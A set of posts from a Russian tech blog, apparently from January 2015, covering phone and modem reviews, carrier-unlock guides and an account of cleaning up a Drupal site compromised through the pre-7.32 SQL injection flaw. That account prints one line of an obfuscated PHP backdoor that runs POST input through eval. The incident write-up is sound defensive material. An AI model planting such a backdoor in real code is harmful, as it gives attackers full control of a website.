пятница, 30 января 2015 г.

Мегафон Login+ (MFLoginPh) - новый 4-х ядерный фаблет (5.5") от Мегафон

Не так давно в Twitter канале Эльдара Муртазина (ведущий аналитик Mobile Research Group) появилась запись следующего содержания "Можно заказывать похоронный марш по многим Б-брендам - на днях покажут новый аппарат от Мегафон, цена и исполнение отличны. 5+", как предположили пользователи в комментариях - речь идет о новом аппарате от Мегафона - Мегафон Login+ продажи которого в салонах связи стартуют с 3 февраля. Вообщем, так или иначе, пока в интернете упорно ходили слухи о появлении смартфона Мегафон Login 3, компания подготовила своим абонентам совершенно другой сюрприз - в виде 5.5" фаблета с IPS экраном и 4-х ядерным SoC от Mediatek - MTK 6582M. Более подробно о MediaTek MT6582 можно прочитать здесь. Кстати, первым смартфоном в России на этом чипе - был малоизвестный Just5 Spacer, т.е. для тех кто не представляет себе возможности этого чипа и т.п., могу уже сейчас ознакомиться с обзорами и отзывами о Just Spacer'е, т.к. его аппаратная начинка практически такая же.

"В отличие от распространенного чипсета MT6589, указанная платформа совмещает четыре вычислительных ядра ARM Cortex-A7 (1,3 ГГц) с двухъядерным графическим ускорителем Mali-400MP2 (против одноядерного PowerVR SGX544MP в случае MT6589). За счет этого достигается максимальная производительность в современных 3D-играх, возможность проигрывания Full HD-видео и высокая скорость работы интерфейса Android." (с) overclockers.ru

Поддержки LTE в этом чипе, к сожалению, нет, только HSPA, TDSCDMA. Кстати, сравнительную таблицу характеристик чипов от MediaTek можно посмотреть здесь.

Как сообщает Mail.Ru: "Новинка получила имя МегаФон Login+ и предлагает 5,5-дюймовый IPS-экран с разрешением 960х540 пикселей, четырехъядерный процессор MTK 6582M с тактовой частотой 1,3 ГГц и графическим ускорителем Mali-400 MP, 1 ГБ оперативной и 4 ГБ встроенной расширяемой памяти, реализованы поддержка GPS, Bluetooth, Wi-Fi. В наличии - две камеры: 5-мегапиксельная основная и 0,3-мегапиксельная фронтальная. В качестве операционной системы выступает Android 4.4.2 KitKat с предустановленным набором приложений от «МегаФона», а также антивирусом Kaspersky и приложением CleanMaster.

Размеры аппарата составляют 155х77х8,9 мм, вес 153 грамма, что не так уж и мало на фоне многих девайсов с такой диагональю, но это с лихвой компенсируется ценой. А вот аккумулятор мог бы быть и побольше, учитывая толщину и диагональ — 2000 мАч."

Как видно из скриншота, устройство получило кодовое имя MFLoginPh, что видимо расшифровывается как Megafon Login+ Phablet:


Ну и напоследок первый видеообзор новинки, который мне удалось обнаружить в интернете:


Еще одно видео с кратким обзором от Максима Кратца:


Как разблокировать Мегафон Login+ (MFLoginPh)?


В данном видео наглядно продемонстрирована техническая возможность разблокировки Мегафон Login+ (MFLoginPh) с помощью NCK-кода (кода разблокировки сети). Код разблокировки для каждого устройства уникален, т.е. показанный в видео код вам не подойдет. Получить код разблокировки для Мегафон Login+ можно здесь - Разблокировка телефона Мегафон Login+ (MFLoginPh). Код., ознакомиться с отзывами людей уже разблокировавших фаблет можно там же, либо на форуме UnlockClub'а.

Как видно, после успешного ввода кода разблокировки с установленной SIM-картой Билайн и последующей перезагрузки - аппарат регистрируется в сети Beeline и все корректно работает.


Также вы можете ознакомиться с видеоинструкцией по считыванию данных необходимых для получения кода Мегафон Login+:


После успешного чтения данных из телефона можно переходить к получению кода.

Ссылки по теме:


четверг, 29 января 2015 г.

Как разблокировать Quanta 1K6E (LTE USB-модем 1K6E)?

Еще одна хорошая новость для всех обладателей 4G/LTE модемов Quanta 1K6E. Теперь есть способ разблокировать его с помощью заводского 16-ти значного кода разблокировки. Модем Quanta 1K6E представляет собой обычный ubs-stick, отличительной особенностью которого является поворотный механизм USB разъема. Т.е. этот модем достаточно легко установить в труднодоступный USB-порт ноутбука или роутера, для этого достаточно отогнуть USB-разъем на 90 градусов, при этом корпус самого модема будет находиться вертикально, по отношению к поверхности на которой стоит ноутбук или роутер. Управление модемом осуществляется через Web-интерфейс, т.е. после установки его в ПК - у вас автоматически устанавливаются драйвера и в системе появляется виртуальный Ethernet (RNDIS) адаптер, через который и осуществляется передача данных и вход в web-интерфейс модема.

По-умолчанию, модем доступен по адресу m.home или 192.168.225.1. При попытке установить в модем SIM-карту оператора отличного от Билайн, в web-интерфейсе появляется окно запроса кода разблокировки (код разблокировки представляет собой буквенно-цифровую последовательность из 16 символов):


После успешного ввода кода разблокировки - модем начинает понимать SIM-карты любых операторов (процедура ввода кода разблокировки "однократная", т.е. после ввода кода разблокировки модем разблокируется навсегда). На скриншоте ниже показана работа модема с SIM-картой МТС Россия:


Более подробно о получении кода разблокировки для Quanta 1K6E можно прочитать здесь - Обзор и разблокировка 4G модема Quanta 1K6E (Билайн 1K6E).


Полезные ссылки
  • Обзор и разблокировка 4G модема Quanta 1K6E (Билайн 1K6E) - Не так давно Билайн представил новый 4G USB модем с поворотным механизмом разъема - Quanta 1K6E (Билайн 1K6E). С кратким обзором этого устройства, а также способами его разблокировки от оператора вы можете познакомиться в этой статье.
  • Quanta 1K6E (LTE USB-модем 1K6E) - тема обсуждения модема на форуме UnlockClub'а.
  • Разблокировка 4G модема Quanta 1K6E. Код. - ссылка на торговую площадку, где можно приобрести код.
  • Драйвера для модема 1K6E - драйвера для модема Quanta 1K6E со встроенного CDROM раздела, вернее это и есть то, что записано на этом разделе. Некоторые пользователи, судя по отзывам, испытывают проблемы с установкой драйверов - мол, модем нонейм и т.п. Ничего подобного, все прекрасно устанавливается, и официальные драйвера есть. Как говорится, "вы просто не умеете их готовить".

суббота, 24 января 2015 г.

PuTTYTray. Удобный fork знаменитого PuTTY.

"Век живи, век учись ... ", наверное эта пословица здесь не так уместна, но смысл который я хотел передать - сколько бы ты не знал, с какими инструментами бы не работал, всегда найдется что-то удобное про что ты еще не слышал и что тебе обязательно пригодится. Так, читая один из форумов, я наткнулся на упоминание о форке Putty - PuTTYTray. Среди заявленных фич по сравнению с оригинальным клиентом: удобна минимизация в трей, возможность автозапуска при старте системы, настраиваемая прозрачность окна, подсветка URL, автоматический reconnect (в том числе и при пробуждении ПК), и самое главное - поддержка Android ADB. Вообщем я решил испытать его в повседневной жизни. Если будут еще какие-либо впечатления - отпишусь.

К слову, PuTTYTray по-умолчанию "цепляет" настройки оригинального PuTTY. Т.е. если вы до этого в работе использовали оригинальный клиент - то перенастраивать соединения и т.п. вам не придется.

четверг, 22 января 2015 г.

Можно ли разблокировать Yota Many / Мегафон MR100-2?

На многих форумах и других околомобильных интернет-ресурсах пользователи часто задаются вопросом, а можно ли разлочить 4G WiFi роутер Yota Many или его мегафоновскую версию MR100-2? До недавнего времени ответа на этот вопрос не было. Вернее единственным способом разблокировки этих устройств было написание обращения в компанию Yota с просьбой о предоставлении кода разблокировки. Форму заявления на предоставление кода разблокировки, а также инструкцию по разблокировке можно скачать тут, программу для разблокировки, про которую говорится в инструкции, тут - Many Unlock Tool. Однако, что делать, если по тем или иным причинам обратиться в Yota для предоставления кода разблокировки не получается? (к слову, судя по постам на форуме 4PDA люди пытались обращаться в Мегафон, с просьбой предоставить код разблокировки к мегафоновской версии роутера - Мегафон MR100-2, однако в компании ответили отказом со следующей формулировкой: "Информация о том, что роутер 4G Мегафон MR100-2 работает только с SIM-картой Мегафон, была доведена до Вас в доступной и наглядной форме, путем размещения данной информации на ценнике, а также в Руководстве пользователя, где прямо указано, что Ваша сим-карта должна быть Мегафон").

Способ все-таки есть и появился он как раз на UnlockClub'е, про который я периодически рассказываю на страницах своего блога. В данный момент там проводится тестирование разблокировки Мегафон MR100-2 / Yota Many, и судя по отзывам в теме уже двое человек успешно разблокировали свои девайсы. Собственно вот сама тема: Как разблокировать роутер Мегафон MR100-2 / Yota Many? ... Пруф в виде скриншотов работы Мегафон MR100-2 с симкартой Билайн прилагается. На всякий случай приведу несколько картинок здесь:


На первой показан результат успешного ввода кода разблокировки, а на второй отчетливо видно, что роутер зарегистрировался в сети Beeline 3G, после этого был отправлен USSD-запрос *110*10# (узнать собственный номер телефона), а также получен ответ от оператора в SMS. Так что все работает. Возможно на днях, я выложу здесь видео по разблокировке данных устройств.

Обратите внимание, что проводимое в рамках темы Как разблокировать роутер Мегафон MR100-2 / Yota Many? тестирование имеет ограниченный срок действия. На момент написания этой заметки осталось еще 7 "свободных заявок" на бесплатное получение кода разблокировки. С подробностями проводимого тестирования можно ознакомиться там же.

Чуть позже, наверное, я выложу в своем блоге видеоролик наглядно демонстрирующий процесс разблокировки устройства, а также другую полезную информацию. Прошивки для Мегафон MR100-2 и Yota Many, описание способа получения доступа к расширенной панели администрирования Gemtek для этих устройств и др. Ну а на сегодня всё ;)

Статьи и обзоры

четверг, 15 января 2015 г.

ALCATEL ONETOUCH PIXI 3 Family

Не так давно из официальных источников стало известно, что Alcatel запустил новую линейку телефонов PIXI 3. Среди представленных моделей 3G и 4G LTE смартфоны. Главным "козырем" линейки является ОС-независимость, т.е. судя по заявлениям производителя будет поддерживаться как Firefox OS, так и Android и даже мобильные ОС семейства Windows. Каким образом этом будет реализовано, т.е. можно ли будет установить Android в телефон приобретенный с Firefox OS и, наооборот, или же определенные модели аппаратов будут поставляться с определенной ОС на сайте производителя не говорится. Цены тоже пока неизвестны, однако, на сайте написано что семейство телефонов Alcatel PIXI 3 - это еще один шаг к 4G LTE интернету по доступной цене.

6 января 2015 на выставке CES 2015 компания Alcatel, один из самых быстрорастущих мировых брендов производителей смартфонов, объявила о запуске третьего поколения семейства смартфонов PIXI - Alcatel OneTouch PIXI 3. В рамках линейки пользователям будут доступны несколько различных моделей, начиная от компактных, умещающихся в кармане 3.5" смартфонов до солидных 5" аппаратов, Ожидаются следующие варианты устройств: PIXI 3 (4”), (4.5”) и (5”) с поддержкой 3G/4G LTE и 3G-версия PIXI 3 (3.5”). При этом также, разделение будет идти не только по размеру экрана, а также наличию / отсутствию 4G/LTE модуля, но и в рамках используемой ОС (Android, Firefox OS, Windows). Что касается версий Windows и Firefox OS - пока непонятно, а вот пользователи Android смогут рассчитывать на Android KitKat и даже Android L.

Краткие технические характеристики смартфонов
Alcatel One Touch PIXI 3

PIXI 3 (3.5”)

DIMENSIONS
112.2 x 62 x 11.9mm
DISPLAY
3.5‘’ HVGA (320x480), TFT 262K color display
Capacitive touch screen with gesture
OS
Android KitKat 4.4
BANDS
Mini SIM, EAP SIM
GSM Quadband (850/ 900/ 1800/ 1900)
UMTS Dualband (900/2100) à EMEA
UMTS Dualband (850/ 1900) à LATAM
UMTS Triband (850/ 1900/ 2100) à LATAM
CPU
Dual Core 1.0GHz
CONNECTIVITY
Wi-Fi 802.11 b/g/n, Wi-Fi Direct, Wi-Fi tethering
Bluetooth (v4.0) with A2DP
HSPA+ (HSDPA/HSUPA), DL 21Mbps/ UL 5.76Mbps
Micro USB 2.0 high speed
GPS optional
CAMERAS
2 Mpxl camera / 2 & 5 Mpxl photos
Front camera VGA & 1.3Mpxl photos opt.
Flash optional / Filters
Video codecs: H.263, MPEG4, H.264, AAC
Video capture: 480P @15fps / Video playback: 480P @15fps
MEMORY
Internal memory: 4GB ROM / 512MB DDR3 RAM
End user: 1.9GB
MicroSD up to 32GB
BATTERY
3G LATAM: 1150mAh, Li-ion, 4.2V, Hard pack
Standby time: 381 hrs(2G); 286 hrs(3G)
Talk time: 6 hrs(2G); 5.7 hrs(3G)
Music player: 35 hrs / Charging time: 3 hrs
3G EMEA: 1300mAh, Li-ion, 4.2V, Hard pack
Standby time: 432 hrs(2G); 325 hrs(3G)
Talk time: 7 hrs(2G); 6.5 hrs(3G)
Music player: 40 hrs / Charging time: 3.4 hrs
CHIPSET
MT6572M
OTHERS
G-sensor, Dual SIM (optional), Handsfree, FM Radio, Smart Torch, 1 finger zoom, Pre-embedded apps, Mini apps

PIXI 3 (4”)

DIMENSIONS
121.6 x 64.4 x 11.6mm (3G)
121.3 x 64.2 x 11.6mm (4G)
DISPLAY
4‘’ WVGA (800x480), TFT 16.7M (3G) 16M (4G) color display
Capacitive 2 points touch screen with gesture
OS
Android KitKat 4.4 (3G)
Android Kitkat for LATAM and L for EMEA (4G)
BANDS
Mini Sim (3G), Micro SIM (4G), EAP SIM
GSM Quadband (850/ 900/ 1800/ 1900)
UMTS Dualband (900/2100) à EMEA
UMTS Dualband (850/ 1900) à LATAM
UMTS Triband (850/900/2100) à LATAM
UMTS Triband (850/ 1900/ 2100) à LATAM
LTE B1/3/7/8/20 (EMEA); B1/2/4/7/28 (LATAM) (4G)
CPU
Dual Core 1.0GHz (3G)
Quad core, 1.1GHz (4G)
CONNECTIVITY
Wi-Fi 802.11 b/g/n, Wi-Fi Direct, Wi-Fi tethering
Bluetooth (v4.0) with A2DP
HSPA+ (HSDPA/HSUPA), DL 21Mbps/ UL 5.76Mbps (3G) //// LTE DL 150Mbps, UL 50Mbps (4G)
Micro USB 2.0 high speed
GPS
CAMERAS
2 & 5 Mpxl camera / 3, 5 & 8 Mpxl photos
Front camera VGA & 1.3Mpxl photos opt.
Flash / Filters / HDR (3G) / Panorama
Video codecs: H.263, MPEG4, H.264, AAC (3G)
// (H.263, H.264, H.265, AVC, MPEG-4 SP, VP8, VP9) (4G)
Video capture: 720P @30fps / Video playback: 720P @30fps (3G)
Video capture: 720P @30fps / Video playback: 1080p @30fps (4G)
MEMORY
Internal memory: 4GB ROM / 512MB RAM
End user: 1.8GB (3G) // 2GB (4G)
MicroSD up to 32GB
BATTERY
3G LATAM:
1300mAh, Li-ion, 4.2V, Hard pack
Standby time: 433 hrs(2G); 325 hrs(3G)
Talk time: 7.8 hrs(2G); 7.2 hrs(3G)
Charging time: 3.3 hrs
3G EMEA:
1400mAh, Li-ion, 4.2V, Hard pack
Standby time: 466 hrs(2G); 350 hrs(3G)
Talk time: 8.3 hrs(2G); 7.8 hrs(3G)
Charging time: 3.5 hrs
4G: 1650mAh
CHIPSET
MT6572M (3G)
MSM8909 (4G)
OTHERS
G-sensor, Dual SIM (optional), Handsfree, FM Radio, Smart Torch, 1 finger zoom, Pre-embedded apps, QR code in camera, Mini apps, Download booster (4G)

PIXI 3 (4.5”) 

DIMENSIONS
132.2 x 65.1 x 11.7mm (3G)
132.2 x 65.1 x 9.95mm (4G)
DISPLAY
4.5‘’ FWVGA (854x480), TFT 16M color display
Capacitive 2 points touch screen on-cell
OS
Android KitKat 4.4
BANDS
Mini Sim (3G), Micro SIM (4G), EAP SIM
GSM Quadband (850/ 900/ 1800/ 1900)
UMTS Dualband (900/2100) à EMEA
UMTS Triband (850/900/2100) à LATAM
UMTS Triband (850/ 1900/ 2100) à LATAM
LTE B1/3/7/8/20(EMEA); B1/2/3/4/7/28(LATAM) (4G)
CPU
Dual Core 1.0GHz (3G)
Quad core, 1.1GHz (4G)
CONNECTIVITY
Wi-Fi 802.11 b/g/n, Wi-Fi Direct
USB modem tethering
Bluetooth (v4.0)
HSPA+ (HSDPA/HSUPA), DL 21Mbps/ UL 5.76Mbps (3G) //// LTE DL 150Mbps, UL 50Mbps (4G)
Micro USB 2.0 high speed
GPS
CAMERAS
5 Mpxl camera / 8 Mpxl photos
Front camera VGA & 1.3Mpxl & 2Mpxl photos opt.
Flash / Filters / HDR(3G) / Panorama (4G)
Video codecs: (H.263, H.264 AVC, MPEG-4 SP, VP8) (3G)
Video capture: 480P @15fps / Video playback: 720P @30fps (3G)
Video capture: 720P @30fps / Video playback: 720P @30fps (4G)
MEMORY
Internal memory: 4GB ROM / 512MB RAM
(4GB ROM/1GB RAM, variant 3G Latam)
End user: 2GB
MicroSD up to 32GB
BATTERY
3G:
1400mAh, Hard pack
Standby time: 480 hrs(2G); 300 hrs(3G)
Talk time: 10 hrs(2G); 9.5 hrs(3G)
Charging time: 3 hrs
4G:
1800mAh, Hard pack
Standby time: 270 hrs(2G); 220 hrs(3G); 200 hrs(4G)
Talk time: 10 hrs
Charging time: 3.5 hrs
CHIPSET
MTK6572M (3G)
MTK6735M (4G)
OTHERS
G-sensor, Dual SIM (optional), Handsfree, FM Radio, Smart Torch, 1 finger zoom, Pre-embedded apps, QR code in camera, Mini apps, Download booster (4G)

PIXI 3 (5”)

DIMENSIONS
141 x 71.5x 9.95 mm
DISPLAY
5‘’ FWVGA (854x480), TFT 16m color display
Capacitive touch screen with gesture
Miravision technologie (3G)
OS
Android Kitkat (3G)
Android L (4G)
BANDS
Micro Sim, EAP SIM
GSM Quadband (850/ 900/ 1800/ 1900)
UMTS Dualband (900/ 2100) à EMEA
UMTS Quadband (850/ 900/ 1900/ 2100) à LATAM
UMTS Triband (850/ 900/ 2100) à APAC
LTE EMEA: B1/3/7/8/20 // APAC: B1/3 // LATAM: B1/2/3/4/7/28
CPU
Dual Core 1.3GHz (QuadCore 1.3GHz optional) (3G)
Quad Core 1.1GHz (4G)
CONNECTIVITY
Wi-Fi 802.11 b/g/n, Wi-Fi Direct, USB modem tethering Bluetooth, HSPA+ (HSDPA/HSUPA), DL 21Mbps/ UL 5.76Mbps (3G) //// LTE DL 150Mbps, UL 50Mbps (4G)
GPS, Wifi display (Miracast)
Micro USB, 2.0 High Speed
CAMERAS
5Mpxl & 8Mpxl camera / 10Mpxl photos
Flash optional, HDR, Panorama, Fast auto focus opt. (AF camera, 3G), Video effect & Camera image effects (3G), filters
Video codecs: H.264, H.263, MPEG-4, XVID, VP8, VC-1
Video capture: 720P@30fps/ Video playback: 1080p 30fps
Front camera 0.3 & 2 Mpxl camera / 1.3 & 3 Mpxl photos
MEMORY
Internal memory: 4GB ROM / 512MB RAM (8GB ROM/ 1GB RAM compatible) (3G)
8GB ROM / 1GB RAM (4G)
End user: 2GB / MicroSD up to 32GB
BATTERY
3G: 1800mAh, Hard pack
Standby time: 510 hrs(2G); 450 hrs(3G) / Talk time: 11 hrs(2G); 9 hrs(3G)
Charging time: 4 hrs
4G: 2000mAh, Hard pack
CHIPSET
MT6570 (Default), MT6580 (3G) // MSM8909 (4G)
OTHERS
G-sensor, Dual SIM (optional), Handsfree, FM Radio, Smart Torch, 1 finger zoom, Pre-embedded apps, Mini apps, QR code in camera, Download booster (4G)

Как видно, 3G аппараты будут построены на SoC от MediaTek, в то время как 4G/LTE на MSM от Qualcomm. Кстати, если вы заметили в 4.5" версии PIXI 3 с поддержкой 4G будет использоваться новый чип от MediaTek - MTK6735M, также, с поддержкой LTE.

К слову, только сейчас я наткнулся на новость на iXBT - Смартфоны Alcatel OneTouch Pixi 3 не получили несколько операционных систем, но будут доступны во множестве модификаций, из которой следует, что смартфоны не смогут похвастаться несколькими операционными системами. На самом деле в ассортименте будут доступны три модификации каждого аппарата с различными ОС.


Ну и вот несколько видеороликов с новинками (правда на "китайском" и на немецком):




p.s. Разобраться с многообразием версий и индексов новинок можно на официальном сайте производителя. Плюс, ко всему - для некоторых моделей телефонов имеются также и двухсимочные (!) версии.

пятница, 9 января 2015 г.

Критическая уязвимость в Drupal и ее последствия

Казалось бы Рождество, и чем мне не отдыхается ... Ан нет. Как говорится "поступил тревожный сигнал" и пришлось работать. Предыстория вообщем-то банальна. У одних моих знакомых был небольшой проект на Drupal. Сайт им делали очень давно и с человеком который его разрабатывал они давно расстались. В результате контент-менеджер добавлял на него новости и все вроде работало до одного прекрасного момента, который как раз настал в ночь под рождество. В пользователях сайта появился пользователь drupaldev (и несколько других), которые входили в группу megauser, которую естественно никто никогда не создавал. Это и послужило сигналом забить тревогу.

Сайт был построен на движке Drupal 7.19 ... когда я заглянул в админку, то вообщем-то не удивился, не обновленное ядро, куча модулей версии которых уже успели устареть на несколько лет. Т.к. безопасностью особенно никто не занимался, то неудивительно что сайт взломали. Первое на что я наткнулся при беглом поиске в интернете по паттерну "drupadev" была статья: Внимание! Критическая уязвимость во всех версиях drupal ниже Drupal 7.32 (Highly critical) (update 9). Если у вас сайт именно на Drupal < 7.32 крайне рекомендую с ней ознакомиться. Прочитав статью, я первым делом сделал backup сайта, на всякий случай, пропатчил уязвимость, заменив в файле includes/database/database.inc в цикле foreach - $data на array_values($data) и принялся смотреть что же стало с сайтом. А итоги были неутешительными. Практически в каждый второй PHP скрипт на сайте был встроен PHP Shell, плюс во всех директориях были созданы дополнительные PHP скрипты, содержащие этот же шелл. Причем в каждом файле текст шелла отличался от предыдущего. Чтобы было понятно покажу наглядно:

$qV="stop_";$s20=strtoupper($qV[4].$qV[3].$qV[2].$qV[0].$qV[1]);if(isset(${$s20}['q4ddc19'])){eval(${$s20}['q4ddc19']);

Если разобрать все это, то у нас получается - eval($_POST['q4ddc19']); Т.е. фактически каждый из "зараженных" скриптов принимал на входе один параметр в POST, содержимое которого тут же интерпретировалось в eval и выполнялось. Т.е. фактически по всему сайту оказались натыканы backdoor'ы, а злоумышленники могли сделать с ним что хотели. Плюс, ситуация осложнялась тем, что shell был "полиморфным". Т.е. в каждом новом файле его код отличался от предыдущего. Если во время "разбора полетов" пропустить хотя бы одну такую "закладку", то вся работа, естественно, насмарку, т.к. злоумышленники в любой момент могут получить доступ к сайту и сделать на нем что угодно, даже после установки всех заплаток и обновлений.

Как я все это вычищал - рассказывать не буду. Обновление ядра, немного фантазии, полуавтоматический анализ пары сотен оставшихся PHP файлов, удаление вредоносного кода, обновление модулей - и сайт "как новый".  Правда, надо признать, что масштаб заражения (т.е. количество мест на сайте в котором были оставлены закладки) был таким, что обычный пользователь вычистил бы все это с большим трудом, если бы вообще вычистил. История показательна другим ... за обновлениями безопасности и community-сайтами своей CMS нужно постоянно следить. Если есть автоматическая функция обновления ядра / модулей CMS рекомендуется включить ее, при появлении информации о критических уязвимостях - немедленно устранять их. Впрочем, все это прописные истины ... На этом, пожалуй, не сегодня все.

воскресенье, 4 января 2015 г.

Как разблокировать Alcatel One Touch Y850V0?

Не так давно в продаже в салонах связи Билайн появился 4G/Wi-Fi роутер Alcatel One Touch Y850V0. Роутер работает в сетях 4G/HSPA+/3G/2G со скоростью соединения при выходе в Интернет до 150 Мбит/с. Как заявлено на официальном сайте оператора "Новый роутер отличается красивым и современным дизайном, расширенным функционалом и поддержкой высоких скоростей мобильного интернета" - и это действительно так. Вот фото новинки, сделанные пользователем tabyk одного из популярных мобильных форумов 4PDA:




Краткие технические характеристики Alcatel One Touch Y850V0


  • Стандарты связи: GSM 850/900/1800/1900 МГц, UMTS 900/2100 МГц, LTE 800(B20)/1800(B3)/2600(B7)
  • Скорость передачи данных по технологии LTE: до 150 Мбит/с при загрузке данных и до 50 Мбит/с при отправке данных (указанные скорости являются теоретическим максимом)
  • Поддержка Wi-Fi IEEE 802.11 a/b/g/n, диапазоны 2.4 GHz и 5 GHz, скорость передачи данных до 150 Мбит/с (теоретический максимум для стандарта IEEE 802.11n)
  • Поддержка одновременного подключения 10 WiFi устройств
  • OLED-экран (0.91")
  • Батарея 3000 мА·ч
  • Поддержка приема и отправки SMS, USSD-запросов

Как следует из надписи на коробке - роутер изначально настроен на работу с SIM-картами "Билайн". Для использования роутера с SIM-картами других операторов потребуется код разблокировки сети (NCK-код), который можно получить здесь.

Полезные ссылки


суббота, 3 января 2015 г.

3G-модем Alcatel OT-X602D. Обзор и разблокировка.

Вот и наступил 2015-й год и я, по традиции, решил сделать небольшой обзор новостей. Правда обзор будет кратким, а новость в этом посте будет всего одна ;) Не так давно на UnlockClub'е появилась статья в которой рассказывалось о модеме Alcatel X602D, а также способах его разблокировки от оператора.

Проект UnlockClub.Ru первым в мире заявил о возможности разблокировки OT-X602D NCK-кодом. Отличительной особенностью OT-X602D является то, что этот модем построен на чипе Spreadtrum SC7702. Ввиду отличия программной и аппаратной составляющей X602D от остальных моделей Alcatel - десятизначные коды разблокировки, которые можно найти на многих сайтах, посвященных мобильным устройствам и разблокировке, в частности, к нему не подходят. Модем запрашивает 8-ми значный код разблокировки:

Alcatel X602D. Запрос кода разблокировки.
Получить код разблокировки для X602D можно будет уже после новогодних праздников.


Технические характеристики модема ничем особенным не выделяются. Alcatel OT-X602D - это обычный 3G-модем, работающий в сетях 2G/3G: UMTS/HSPA+ (900/2100 MHz) и GSM/GPRS/EDGE (850/900/1800/1900 MHz). Слота под SD-карту у него нет, возможности раздачи интернет по WiFi тоже. Вообщем, обычная "рабочая лошадка", которая с успехом может использоваться для доступа к мобильному интернет, например, с ноутбука.

Тестировать реальную скорость соединения нет смысла, т.к. фактически все зависит от покрытия в конкретном месте подключения, так, например у меня SpeedTest выдал следующую картинку:


При этом правда, уровень сигнала, судя по показаниям ПО USB-модем "Билайн" был не очень высоким (-97 ... -95 дБм):

Кстати, продающийся в российском Билайне Alcatel OT-X602D по-умолчанию способен работать в сетях со следующими MCC/MNC:

  • Kyrgyzstan, Beeline/Bitel (43701)
  • Russian Federation, VimpelCom (25099)
  • Armenia, ArmenTel/Beeline (28301)
  • Georgia, MobiTel/Beeline (28204)
  • Kazakhstan, Beeline/KaR-Tel LLP (40101)
  • Tajikistan, Bee Line (43605)
  • Ukraine, Beeline (25502)
  • Ukraine, KyivStar (25503)
  • Uzbekistan, Bee Line/Unitel (43404)

Для использования модема в других сетях, потребуется код разблокировки.

Полезные ссылки

пятница, 2 января 2015 г.

С Новым Годом !

Поздравляю всех посетителей моего блога с уже наступившим Новым Годом! Честно говоря, никакой специальной речи по этому случаю я не подготовил, да и некогда было. Поэтому, просто хочется сказать спасибо нашим посетителям, за то что все это время они были с нами. Искренне желаю вам счастья, здоровья и исполнения всех желаний в наступившем 2015 году! Что касается меня - я принял решение продолжать вести этот блог. Когда я его начинал в апреле 2014 (а может это и раньше было), никаких особенных мыслей у меня не было - т.е. ни тематической направленности, ни чего-либо еще. Так что проект мог кануть в лету, даже не начавшись. Однако, судя по всему, он оказался интересным для вас, поэтому decker.su еще задержится в интернете, как минимум на год ;)